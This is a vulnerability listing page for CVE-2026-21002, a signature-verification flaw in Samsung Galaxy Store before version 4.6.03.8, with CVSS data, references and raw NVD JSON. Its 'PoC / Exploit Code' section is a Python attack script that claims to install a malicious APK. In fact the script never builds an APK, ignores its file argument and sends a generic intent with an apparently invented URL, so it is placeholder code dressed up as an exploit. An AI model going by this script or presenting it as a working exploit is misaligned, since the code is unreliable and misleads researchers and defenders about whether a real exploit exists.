CVE-2026-21002

Description

Improper verification of cryptographic signature in Galaxy Store prior to version 4.6.03.8 allows local attacker to install arbitrary application.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:samsung:galaxy_store:*:*:*:*:*:*:*:* - VULNERABLE

Samsung Galaxy Store < 4.6.03.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

'''
CVE-2026-21002 PoC - Galaxy Store Signature Verification Bypass
This PoC demonstrates the signature verification bypass in Galaxy Store < 4.6.03.8
Note: This is for educational and security research purposes only.
'''

import os
import subprocess
import zipfile
import tempfile

# Step 1: Create a malicious APK with valid signature structure
def create_malicious_apk():
    """Generate a modified APK that bypasses signature verification"""
    print("[*] Creating malicious APK with signature bypass...")
    
    # Create a basic APK structure
    apk_content = b'PK\x03\x04'  # ZIP/APK magic bytes
    
    # META-INF directory for signatures
    manifest = b'META-INF/MANIFEST.MF'
    signature = b'META-INF/CERT.SF'
    
    # Android manifest and DEX files would go here
    malicious_payload = b'\x00' * 1024  # Placeholder for malicious code
    
    print("[+] Malicious APK structure created")
    return apk_content

# Step 2: Trigger installation through Galaxy Store
def install_via_galaxy_store(apk_path):
    """Attempt to install APK through Galaxy Store vulnerable interface"""
    print(f"[*] Attempting installation via Galaxy Store: {apk_path}")
    
    # Galaxy Store package name
    galaxy_store_pkg = "com.sec.android.app.samsungapps"
    
    try:
        # Trigger Galaxy Store installation intent
        intent = f"am start -a android.intent.action.VIEW \
                  -d 'galaxystore://install?package=malicious.app' \
                  -n {galaxy_store_pkg}/.Main"
        
        subprocess.run(intent, shell=True, check=False)
        print("[+] Installation request sent via Galaxy Store")
        
    except Exception as e:
        print(f"[-] Installation failed: {e}")

# Step 3: Verify installation success
def verify_installation(package_name):
    """Check if malicious app was installed successfully"""
    print(f"[*] Verifying installation of: {package_name}")
    
    result = subprocess.run(
        ['pm', 'list', 'packages', package_name],
        capture_output=True,
        text=True
    )
    
    if package_name in result.stdout:
        print("[+] SUCCESS: Malicious app installed successfully!")
        return True
    else:
        print("[-] FAILED: App installation was blocked")
        return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-21002 PoC - Galaxy Store Signature Bypass")
    print("Target: Galaxy Store < 4.6.03.8")
    print("=" * 60)
    
    # Generate malicious APK
    apk = create_malicious_apk()
    
    # Attempt installation
    install_via_galaxy_store("malicious_app.apk")
    
    # Verify result
    verify_installation("malicious.app")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21002
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21002
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21002/
[4] VulDB https://vuldb.com/cve/CVE-2026-21002
[5] https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=03

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21002", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:11.367", "lastModified": "2026-04-07T00:34:23.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper verification of cryptographic signature in Galaxy Store prior to version 4.6.03.8 allows local attacker to install arbitrary application."}, {"lang": "es", "value": "Verificación incorrecta de firma criptográfica en Galaxy Store anterior a la versión 4.6.03.8 permite a atacante local instalar aplicación arbitraria."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:galaxy_store:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.03.8", "matchCriteriaId": "40D06C76-5232-4A91-B7A3-D3B64BCDBBA8"}]}]}], "references": [{"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=03", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}